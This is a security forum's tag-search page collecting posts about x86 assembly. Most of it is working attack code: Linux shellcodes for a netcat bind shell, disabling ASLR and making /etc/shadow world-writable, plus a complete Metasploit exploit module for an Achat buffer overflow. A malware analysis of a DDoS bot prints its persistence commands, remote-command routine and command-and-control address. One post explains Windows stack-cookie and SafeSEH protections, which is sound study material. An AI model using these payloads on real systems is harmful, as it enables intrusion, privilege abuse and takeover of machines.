Jump to content

Search the Community

Showing results for tags 'eax'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 7 results

  1. /* # Linux x86 /bin/nc -le /bin/sh -vp 17771 shellcode # This shellcode will listen on port 17771 and give you /bin/sh # Shellcode Author: Oleg Boytsev # Tested on: Debian GNU/Linux 7/i686 # Shellcode Length: 58 # Command: gcc -m32 -z execstack x86_Linux_netcat_shellcode.c -o x86_Linux_netcat_shellcode global _start section .text _start: xor eax, eax xor edx, edx push eax push 0x31373737 ;-vp17771 push 0x3170762d mov esi, esp push eax push 0x68732f2f ;-le//bin//sh push 0x6e69622f push 0x2f656c2d mov edi, esp push eax push 0x636e2f2f ;/bin//nc push 0x6e69622f mov ebx, esp push edx push esi push edi push ebx mov ecx, esp mov al,11 int 0x80 */ #include<stdio.h> #include<string.h> unsigned char shellcode[] = "\x31\xc0\x31\xd2\x50\x68\x37\x37\x37\x31\x68\x2d\x76\x70\x31\x89\xe6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f\x89\xe7\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89\xe3\x52\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80"; main() { printf("Shellcode Length: %d\n",strlen(shellcode)); int (*ret)() = (int(*)())shellcode; ret(); } Source
  2. /* #Title: Disable ASLR in Linux (less byte and more compact) #Length: 84 bytes #Date: 3 April 2015 #Author: Mohammad Reza Ramezani (mr.ramezani.edu@gmail.com - g+) #Tested On: kali-linux-1.0.6-i386 Thanks to stackoverflow section .text global _start _start: jmp short fileaddress shellcode: pop ebx xor eax,eax mov byte [ebx + 35],al push byte 5 pop eax push byte 2 pop ecx int 80h mov ebx, eax push byte 4 pop eax jmp short output cont: pop ecx push byte 2 pop edx int 80h push byte 1 pop eax xor ebx, ebx int 80h fileaddress: call shellcode db '/proc/sys/kernel/randomize_va_spaceX' output: call cont db '0',10 */ char shellcode[] = "\xeb\x22\x5b\x31\xc0\x88\x43\x23\x6a\x05\x58" "\x6a\x02\x59\xcd\x80\x89\xc3\x6a\x04\x58\xeb\x36\x59\x6a\x02\x5a \xcd\x80\x6a\x01\x58\x31\xdb\xcd\x80\xe8\xd9\xff\xff\xff\x2f\x70 \x72\x6f\x63\x2f\x73\x79\x73\x2f\x6b\x65\x72\x6e\x65\x6c\x2f\x72 \x61\x6e\x64\x6f\x6d\x69\x7a\x65\x5f\x76\x61\x5f\x73\x70\x61\x63 \x65\x58\xe8\xc5\xff\xff\xff\x30\x0a"; int main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode; } Source
  3. /* * Linux x86 - execve chmod 0777 /etc/shadow * Obfuscated version - 84 bytes * Original: http://shell-storm.org/shellcode/files/shellcode-828.php * Author: xmgv * Details: https://xmgv.wordpress.com/2015/03/13/slae-6-polymorphic-shellcode/ */ /* global _start section .text _start: sub edx, edx push edx mov eax, 0xb33fb33f sub eax, 0x3bd04ede push eax jmp short two end: int 0x80 four: push edx push esi push ebp push ebx mov ecx, esp push byte 0xc pop eax dec eax jmp short end three: push edx sub eax, 0x2c3d2dff push eax mov ebp, esp push edx add eax, 0x2d383638 push eax sub eax, 0x013ffeff push eax sub eax, 0x3217d6d2 add eax, 0x31179798 push eax mov ebx, esp jmp short four two: sub eax, 0x0efc3532 push eax sub eax, 0x04feca01 inc eax push eax mov esi, esp jmp short three */ #include <stdio.h> #include <string.h> unsigned char code[] = "\x29\xd2\x52\xb8\x3f\xb3\x3f\xb3\x2d\xde\x4e\xd0\x3b\x50\xeb\x33\xcd\x80" "\x52\x56\x55\x53\x89\xe1\x6a\x0c\x58\x48\xeb\xf2\x52\x2d\xff\x2d\x3d\x2c" "\x50\x89\xe5\x52\x05\x38\x36\x38\x2d\x50\x2d\xff\xfe\x3f\x01\x50\x2d\xd2" "\xd6\x17\x32\x05\x98\x97\x17\x31\x50\x89\xe3\xeb\xcf\x2d\x32\x35\xfc\x0e" "\x50\x2d\x01\xca\xfe\x04\x40\x50\x89\xe6\xeb\xca"; int main() { printf("Shellcode Length: %d\n", strlen(code)); int (*ret)() = (int(*)())code; ret(); }
  4. The spree of exploits on Windows has led to the creation of a certain type of exploit protection mechanism on Windows. Protection from things like buffer overflow, heap overwrite and return originated exploits have been deployed on Windows compilers and OS. They can be either OS specific or compiler based protections. EMET can be used to apply some of these protections on Windows binaries. According to Microsoft: “The Enhanced Mitigation Experience Toolkit (EMET) is a utility that helps prevent vulnerabilities in software from being successfully exploited. EMET achieves this goal by using security mitigation technologies. These technologies function as special protections and obstacles that an exploit author must defeat to exploit software vulnerabilities. These security mitigation technologies do not guarantee that vulnerabilities cannot be exploited. However, they work to make exploitation as difficult as possible to perform.” Compiler protections included in MSVC are: /GF enable read-only string pooling /Gm[-] enable minimal rebuild /Gy[-] separate functions for linker /GS[-] enable security checks /GR[-] enable C++ RTTI /GX[-] enable C++ EH (same as /EHsc) /EHs enable C++ EH (no SEH exceptions) /EHa enable C++ EH (w/ SEH exceptions) /EHc extern "C" defaults to nothrow /Qfast_transcendentals generate inline FP intrinsics even with /fp:except /GL[-] enable link-time code generation /GA optimize for Windows Application /Ge force stack checking for all funcs /Gs[num] control stack checking calls /Gh enable _penter function call /GH enable _pexit function call /GT generate fiber-safe TLS accesses /RTC1 Enable fast checks (/RTCsu) /RTCc Convert to smaller type checks /RTCs Stack Frame runtime checking /RTCu Uninitialized local usage checks /clr[:option] compile for common language runtime, where option is: pure - produce IL-only output file (no native executable code) safe - produce IL-only verifiable output file oldSyntax - accept the Managed Extensions syntax from Visual C++ 2002/2003 initialAppDomain - enable initial AppDomain behavior of Visual C++ 2002 noAssembly - do not produce an assembly /Gd __cdecl calling convention /Gr __fastcall calling convention /Gz __stdcall calling convention /GZ Enable stack checks (/RTCs) /QIfist[-] use FIST instead of ftol() /hotpatch ensure function padding for hotpatchable images /arch:<SSE|SSE2|AVX> minimum CPU architecture requirements, one of: SSE - enable use of instructions available with SSE enabled CPUs SSE2 - enable use of instructions available with SSE2 enabled CPUs AVX - enable use of Intel(R) Advanced Vector Extensions instructions /Qimprecise_fwaits generate FWAITs only on "try" boundaries, not inside "try" /Qsafe_fp_loads generate safe FP loads So it makes exploitation difficult but does not ultimately protect against it. Stack-Based OverRun Detection (GS) This is the oldest and most famous protection available in Visual C++. The goal of the /GS compiler flag is simple: reduce the chance that maleficent code will execute correctly. The /GS option is on by default in Visual C++ 2003 and later, and it detects certain kinds of stack smash at run time. It goes about doing this by including a desultory number in a function’s stack just before the return address on the stack, and when the function returns, the function epilogue code checks this value to ascertain it has not transmuted. If the cookie, as it’s called, has been mutated, execution is halted. So GS stack cookie basically protects against tampering of return addresses. Now let’s go into detail how it works: Consider the following C code compiled using /GS parameter of Microsoft C compiler: #include void vuln() { unsigned char x[10] = {0}; int i = 0; while (i != 100) x[i++] = ‘A'; } int main(int argc, char **agrv) { vuln(); } If we compile it using MSVC switch /GS it would get the GS stack-based protection embedded. Let’s see what is added at the vuln function for GS stack protection. Stack Cookie Resides soon after Saved EBP i.e EBP-4 as shown in the IDA disassembly: As you can see in the beginning of the prologue of the function, the __security_cookie is retrieved and xored with EBP. So if the attacker had to overwrite the return address he needs to guess the __security_cookie as clearly we see that it will also get overwritten. Now let’s see how it is generated and if it contains enough randomness in order to be secure. This value is generated in ___security_init_cookie() function which looks like: ___security_init_cookie proc near ; CODE XREF: $LN26#p .text:0040267F .text:0040267F PerformanceCount= LARGE_INTEGER ptr -10h .text:0040267F SystemTimeAsFileTime= _FILETIME ptr -8 .text:0040267F .text:0040267F mov edi, edi .text:00402681 push ebp .text:00402682 mov ebp, esp .text:00402684 sub esp, 10h .text:00402687 mov eax, ___security_cookie .text:0040268C and [ebp+SystemTimeAsFileTime.dwLowDateTime], 0 .text:00402690 and [ebp+SystemTimeAsFileTime.dwHighDateTime], 0 .text:00402694 push ebx .text:00402695 push edi .text:00402696 mov edi, 0BB40E64Eh .text:0040269B mov ebx, 0FFFF0000h .text:004026A0 cmp eax, edi .text:004026A2 jz short loc_4026B1 .text:004026A4 test ebx, eax .text:004026A6 jz short loc_4026B1 .text:004026A8 not eax .text:004026AA mov dword_408004, eax .text:004026AF jmp short loc_402716 .text:004026B1 ; --------------------------------------------------------------------------- .text:004026B1 .text:004026B1 loc_4026B1: ; CODE XREF: ___security_init_cookie+23#j .text:004026B1 ; ___security_init_cookie+27#j .text:004026B1 push esi .text:004026B2 lea eax, [ebp+SystemTimeAsFileTime] .text:004026B5 push eax ; lpSystemTimeAsFileTime .text:004026B6 call ds:GetSystemTimeAsFileTime .text:004026BC mov esi, [ebp+SystemTimeAsFileTime.dwHighDateTime] .text:004026BF xor esi, [ebp+SystemTimeAsFileTime.dwLowDateTime] .text:004026C2 call ds:GetCurrentProcessId .text:004026C8 xor esi, eax .text:004026CA call ds:GetCurrentThreadId .text:004026D0 xor esi, eax .text:004026D2 call ds:GetTickCount .text:004026D8 xor esi, eax .text:004026DA lea eax, [ebp+PerformanceCount] .text:004026DD push eax ; lpPerformanceCount .text:004026DE call ds:QueryPerformanceCounter .text:004026E4 mov eax, dword ptr [ebp+PerformanceCount+4] .text:004026E7 xor eax, dword ptr [ebp+PerformanceCount] .text:004026EA xor esi, eax .text:004026EC cmp esi, edi .text:004026EE jnz short loc_4026F7 .text:004026F0 mov esi, 0BB40E64Fh .text:004026F5 jmp short loc_402707 .text:004026F7 ; --------------------------------------------------------------------------- .text:004026F7 .text:004026F7 loc_4026F7: ; CODE XREF: ___security_init_cookie+6F#j .text:004026F7 test ebx, esi .text:004026F9 jnz short loc_402707 .text:004026FB mov eax, esi .text:004026FD or eax, 4711h .text:00402702 shl eax, 10h .text:00402705 or esi, eax .text:00402707 .text:00402707 loc_402707: ; CODE XREF: ___security_init_cookie+76#j .text:00402707 ; ___security_init_cookie+7A#j .text:00402707 mov ___security_cookie, esi .text:0040270D not esi .text:0040270F mov dword_408004, esi .text:00402715 pop esi .text:00402716 .text:00402716 loc_402716: ; CODE XREF: ___security_init_cookie+30#j .text:00402716 pop edi .text:00402717 pop ebx .text:00402718 leave .text:00402719 retn .text:00402719 ___security_init_cookie endp Firstly, it will compare __security_cookie with the default value: mov edi, 0BB40E64Eh mov ebx, 0FFFF0000h And if matched it will continue to generate a random one. The random value for __security_cookie is generated as a combination of xors for time, processid, threadid, tickcount and QueryPerformanceCounter() values. And then xored and multiplied. or eax, 4711h shl eax, 10h In the epilogue of a function protected by GS stack cookie you will see a call to __security_check_cookie() function which verifies the __security_cookie, and if it is manipulated the process terminates. So done in this way before returning to the attacker controlled area which leverages ret instruction is prevented. SAFESEH SAFESEH was added from Windows XP Sp2. It is an operating system protection technique by which we can protect against SEH overwrites. This technique isn’t available on 64 bit systems, as 64 bit Windows uses a different mechanism for exception handling, which is quite similar to what is used on SAFESEH. A binary is only protected by SAFESEH only if it is explicitly mentioned on the PE header. To check the existence of that header, we can use the Dumpbin tool by Microsoft by using the following command line: dumpbin sample.exe /LOADCONFIG File Type: EXECUTABLE IMAGE Section contains the following load config: 00000048 size 0 time date stamp 0.00 Version 0 GlobalFlags Clear 0 GlobalFlags Set 0 Critical Section Default Timeout 0 Decommit Free Block Threshold 0 Decommit Total Free Threshold 00000000 Lock Prefix Table 0 Maximum Allocation Size 0 Virtual Memory Threshold 0 Process Heap Flags 0 Process Affinity Mask 0 CSD Version 0000 Reserved 00000000 Edit list 00408310 Security Cookie 00407840 Safe Exception Handler Table 3 Safe Exception Handler Count Safe Exception Handler Table Address ——– 00402390 00403FD0 00405040 When an exception occurs, th exception is transferred to the SAFESEH handler in ntdll.dll and it checks if the exception target is present in the SAFESEH list. Following is the implementation of RtlCaptureImageExceptionValues on Windows XP sp2. If the target address isn’t present in the list, then RtlCallKernel32UnhandledExceptionFilter is called to terminate the program. Source/url]
  5. The malware is not Elknot, IptabLesx or Billgates, is using AES to decrypt the target & CNC data, and contains 13 flooders (they added these one by one..so the next variant maybe more..). Originated from China, with the spreading method via ssh hacking. The malware firstly spotted few times in mid 2014. This sample is not the first sample/new one. This sample was served in the panel below, noted: just being released sample: Some notes: Flood mitigation can be applied to filter this specific header: (reff: .rodata:0x080ED38F && .rodata:0x080ED474) Accept-Language: zh-cn Accept-Language: zh-CN Autostart installation: sed -i -e '/%s/d' /etc/rc.local sed -i -e '2 i%s/%s' /etc/rc.local sed -i -e '2 i%s/%s start' /etc/rc.d/rc.local sed -i -e '2 i%s/%s start' /etc/init.d/boot.local Source files (unstripped) File : 'crtstuff.c' File : 'AES.cpp' File : 'main.cpp' File : 'eh_personality.cc' File : 'eh_alloc.cc' File : 'eh_exception.cc' File : 'eh_call.cc' File : 'pure.cc' File : 'eh_globals.cc' File : 'del_op.cc' File : 'eh_catch.cc' File : 'class_type_info.cc' File : 'allocator-inst.cc' File : 'string-inst.cc' File : 'eh_terminate.cc' File : 'eh_term_handler.cc' File : 'si_class_type_info.cc' File : 'eh_throw.cc' File : 'eh_unex_handler.cc' File : 'vterminate.cc' File : 'tinfo.cc' File : 'new_op.cc' File : 'eh_type.cc' File : 'cp-demangle.c' File : 'functexcept.cc' File : 'regex.cc' File : 'system_error.cc' File : 'functional.cc' File : 'future.cc' File : 'new_handler.cc' File : 'bad_typeid.cc' File : 'bad_alloc.cc' File : 'eh_ptr.cc' File : 'guard.cc' File : 'guard_error.cc' File : 'bad_cast.cc' File : 'ios_failure.cc' File : 'stdexcept.cc' File : 'condition_variable.cc' File : 'mutex.cc' File : 'thread.cc' File : 'unwind-dw2.c' File : 'unwind-dw2-fde-dip.c' File : 'libgcc2.c' File : 'unwind-c.c' Some PoC of AES: .text:0804832C ; AES::AES(unsigned char *) .text:0804832C public _ZN3AESC2EPh ;; .text:0804883E ; AES::KeyExpansion(unsigned char *, unsigned char [4][4]) .text:0804883E public _ZN3AES12KeyExpansionEPhPA4_A4_h ;; DDoS' (13 of them) functions: SYN_Flood, LSYN_Flood, UDP_Flood, TCP_Flood, DNS_Flood1, DNS_Flood2, DNS_Flood3, DNS_Flood4, CC_Flood, CC2_Flood, CC3_Flood, UDPS_Flood, UDP_Flood ;; DDOS 1 0x0804EE62: mov eax, [ebp+arg_0] mov eax, [eax+18Ch] cmp eax, 28h jg short 0x0804EE9D mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z9SYN_FloodPv ; SYN_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create jmp short 0x0804EEC8 ;; DDOS 2 0x0804EE9D: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z10LSYN_FloodPv ; LSYN_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create ;; DDOS 3 0x0804EEED: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z9UDP_FloodPv ; UDP_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 4 0x0804EF3D: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z9TCP_FloodPv ; TCP_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 5 0x0804EF8D: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z10DNS_Flood1Pv ; DNS_Flood1(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 6 0x0804EFDD: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z10DNS_Flood2Pv ; DNS_Flood2(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 7 0x0804F02D: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z10DNS_Flood3Pv ; DNS_Flood3(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 8 0x0804F07D: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z10DNS_Flood4Pv ; DNS_Flood4(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 9 0x0804F0CD: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z8CC_FloodPv ; CC_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 10 0x0804F11D: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z9CC2_FloodPv ; CC2_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 11 0x0804F16D: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z9CC3_FloodPv ; CC3_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 12 0x0804F1BD: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z10UDPS_FloodPv ; UDPS_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 13 0x0804F20A: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z9UDP_FloodPv ; UDP_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 System command interface for execution.. this is bad...hacked server can be used as RAT .text:0x0804E6C2 ; Cmdshell(_MSGHEAD *) .text:0x0804E6C2 public _Z8CmdshellP8_MSGHEAD .text:0x0804E6C2 _Z8CmdshellP8_MSGHEAD proc near .text:0x0804E6C2 .text:0x0804E6C2 arg_0= dword ptr 8 .text:0x0804E6C2 .text:0x0804E6C2 push ebp .text:0x0804E6C3 mov ebp, esp .text:0x0804E6C5 sub esp, 18h .text:0x0804E6C8 mov eax, [ebp+arg_0] .text:0x0804E6CB add eax, 100h .text:0x0804E6D0 mov [esp], eax .text:0x0804E6D3 call system .text:0x0804E6D8 leave .text:0x0804E6D9 retn .text:0x0804E6D9 _Z8CmdshellP8_MSGHEAD endp .text:0x0804E6D9 We can expect CPU info with below format will be sent to remote: :` .text:0x080509E2 lea eax, [ebp+var_1110] .text:0x080509E8 add eax, 68h .text:0x080509EB mov [esp+4], eax .text:0x080509EF lea eax, [ebp+var_1110] .text:0x080509F5 add eax, 64h .text:0x080509F8 mov [esp], eax .text:0x080509FB call _Z10GetCpuInfoPjS_ ; GetCpuInfo(uint *,uint *) .text:0x08050A00 lea eax, [ebp+var_11D0] .text:0x08050A06 mov [esp], eax .text:0x08050A09 call sysinfo .text:0x08050A0E mov [ebp+var_24], eax .text:0x08050A11 mov eax, [ebp+var_11C0] .text:0x08050A17 shr eax, 14h .text:0x08050A1A mov [ebp+var_10A4], eax .text:0x08050A20 mov edx, [ebp+var_11C0] .text:0x08050A26 mov eax, [ebp+var_11BC] .text:0x08050A2C mov ecx, edx .text:0x08050A2E sub ecx, eax .text:0x08050A30 mov eax, ecx .text:0x08050A32 shr eax, 14h .text:0x08050A35 mov [ebp+var_10A0], eax .text:0x08050A3B lea ebx, [ebp+var_43C] .text:0x08050A41 mov eax, 0 .text:0x08050A46 mov edx, 100h .text:0x08050A4B mov edi, ebx .text:0x08050A4D mov ecx, edx .text:0x08050A4F rep stosd .text:0x08050A51 mov ebx, [ebp+var_10A0] .text:0x08050A57 mov ecx, [ebp+var_10A4] .text:0x08050A5D mov edx, [ebp+var_10A8] .text:0x08050A63 mov eax, [ebp+var_10AC] .text:0x08050A69 mov dword ptr [esp+20h], offset aHacker ; "Hacker" .text:0x08050A71 mov [esp+1Ch], ebx .text:0x08050A75 mov [esp+18h], ecx .text:0x08050A79 mov [esp+14h], edx .text:0x08050A7D mov [esp+10h], eax .text:0x08050A81 lea eax, [ebp+var_1110] .text:0x08050A87 mov [esp+0Ch], eax .text:0x08050A8B mov dword ptr [esp+8], offset aVersonexLinuxS ; "VERSONEX:Linux-%s|%d|%d MHz|%dMB|%dMB|%"... .text:0x08050A93 mov dword ptr [esp+4], 400h .text:0x08050A9B lea eax, [ebp+var_43C] .text:0x08050AA1 mov [esp], eax .text:0x08050AA4 call snprintf .text:0x08050AA9 mov eax, ds:MainSocket .text:0x08050AAE test eax, eax CNC: sin_port=htons(48080), sin_addr=inet_addr("119.147.145.215") Loc: 119.147.145.215||4134 | 119.144.0.0/14 | CHINANET | CN | CHINATELECOM.COM.CN | CHINANET GUANGDONG PROVINCE NETWORK DOWNLOAD Pass: infected Source
  6. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Achat v0.150 beta7 Buffer Overflow', 'Description' => %q{ This module exploits an unicode SEH based stack buffer overflow in Achat v0.150. By sending a crafted message to the default port 9256 it's possible to overwrites the SEH handler. Even when the exploit is reliable it depends of timing since there are two threads overflowing the stack in the same time. This module has been tested on Windows XP SP3 and Windows 7. }, 'Author' => [ 'Peter Kasza <peter.kasza[at]itinsight.hu>', # Vulnerability discovery 'Balazs Bucsay <balazs.bucsay[at]rycon.hu>' # Exploit, Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CWE', '121'], ], 'DefaultOptions' => { 'EXITFUNC' => 'process' }, 'Payload' => { 'DisableNops' => true, 'Space' => 730, 'BadChars' => "\x00" + (0x80..0xff).to_a.pack("C*"), 'StackAdjustment' => -3500, 'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed, 'EncoderOptions' => { 'BufferRegister' => 'EAX' } }, 'Platform' => 'win', 'Targets' => [ # Tested OK Windows XP SP3, Windows 7 # Not working on Windows Server 2003 [ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => "\x2A\x46" } ] #ppr from AChat.exe ], 'Privileged' => false, 'DefaultTarget' => 0, 'DisclosureDate' => 'Dec 18 2014')) register_options( [ Opt::RPORT(9256) ], self.class) end def exploit connect_udp # 0055 00 ADD BYTE PTR SS:[EBP],DL # padding # 2A00 SUB AL,BYTE PTR DS:[EAX] # padding # 55 PUSH EBP # ebp holds a close pointer to the payload # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 58 POP EAX # mov eax, ebp # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 05 00140011 ADD EAX,11001400 # adjusting eax # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 2D 00130011 SUB EAX,11001300 # lea eax, eax+100 # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 50 PUSH EAX # eax points to the start of the shellcode # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 58 POP EAX # padding # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding # 59 POP ECX # padding # 0039 ADD BYTE PTR DS:[ECX],BH # padding first_stage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39" sploit = 'A0000000002#Main' + "\x00" + 'Z' * 114688 + "\x00" + "A" * 10 + "\x00" sploit << 'A0000000002#Main' + "\x00" + 'A' * 57288 + 'AAAAASI' * 50 + 'A' * (3750 - 46) sploit << "\x62" + 'A' * 45 # 0x62 will be used to calculate the right offset sploit << "\x61\x40" # POPAD + INC EAX sploit << target.ret # AChat.exe p/p/r address # adjusting the first thread's unicode payload, tricky asm-fu # the first seh exception jumps here, first_stage variable will be executed # by the second seh exception as well. It needs to be in sync with the second # thread, so that is why we adjust eax/ebp to have a close pointer to the # payload, then first_stage variable will take the rest of the job. # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding # 55 PUSH EBP # ebp with close pointer to payload # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 58 POP EAX # put ebp to eax # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 2A00 SUB AL,BYTE PTR DS:[EAX] # setting eax to the right place # 2A00 SUB AL,BYTE PTR DS:[EAX] # adjusting eax a little bit more # 05 00140011 ADD EAX,11001400 # more adjusting # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding # 2D 00130011 SUB EAX,11001300 # lea eax, eax+100 # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding # 50 PUSH EAX # saving eax # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding # 5D POP EBP # mov ebp, eax sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + 'C' * 9 + "\x60\x43" sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread sploit << "\x2A" + first_stage + 'C' * (157 - first_stage.length - 31 -3) # put address of the payload to EAX sploit << payload.encoded + 'A' * (1152 - payload.encoded.length) # placing the payload sploit << "\x00" + 'A' * 10 + "\x00" i = 0 while i < sploit.length do if i > 172000 Rex::sleep(1.0) end sent = udp_sock.put(sploit[i..i + 8192 - 1]) i += sent end disconnect_udp end end Source
  7. A fost un mic pariu cu @Usr6.M-am gandit sa il postez aici pentru cine vrea sa foloseasca functii din windows.h in asm. #include "windows.h" char a2[]="usr6"; char a3[]="Salut"; int main() { __asm { mov eax,0 push eax mov eax,offset a3 push eax mov eax,offset a2 push eax mov eax,0 push eax call DWORD PTR MessageBox pop ebx pop ebx pop ebx pop ebx } }
×
×
  • Create New...